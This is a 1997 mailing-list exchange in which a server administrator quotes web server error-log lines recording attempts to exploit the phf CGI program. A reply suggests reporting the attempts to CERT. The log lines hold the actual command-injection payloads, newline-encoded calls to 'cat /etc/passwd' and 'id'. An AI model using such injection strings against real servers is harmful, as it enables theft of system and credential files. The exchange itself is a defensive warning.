Subject: | |
From: | |
Reply To: | |
Date: | Fri, 9 May 1997 16:37:01 -0400 |
Content-Type: | text/plain |
Parts/Attachments: |
|
|
<snip>
/WWW/WWW/ARPA/httpd_1.3/logs>cat error | grep phf
[Sun Mar 23 11:22:39 1997] httpd: access to /cgi-bin/phf?Qname=%0Acat%20/etc/p
swd denied for t6o16p8.telia.com, reason: file not found
[Sun Apr 6 17:37:06 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs7-2.worldaccess.nl, reason: file not found
[Tue Apr 8 15:17:31 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs8-14.worldaccess.nl, reason: file not found
[Thu Apr 17 06:47:50 1997] httpd: access to /cgi-bin/phf?Q=%0aid denied for pc
-slip.ccs-stag.deakin.edu.au, reason: file not found
[Mon Apr 21 15:03:31 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs8-4.worldaccess.nl, reason: file not found
[Wed Apr 23 06:58:00 1997] httpd: access to /cgi-bin/phf?Qname=asd=%0acat%20/e
/passwd denied for wimol2.wimol.ksc.co.th, reason: file not found
[Mon May 5 06:27:41 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for 139.134.243.139, reason: file not found
While I don't know if phf can get to files in other accounts on the 3000(?),
it's still best disabled. Be careful out there.
-Chris Bartram
</snip>
Chris,
Thank you for warning us about this weakness.
Is there anyone you can send this file fragment to, to let them know that
you have intruders attempting to exploit a well known weakness?
Organizations like CERT and others?
Marshall Medoff, ITA, Inc.
Arlington, Virginia
|
|
|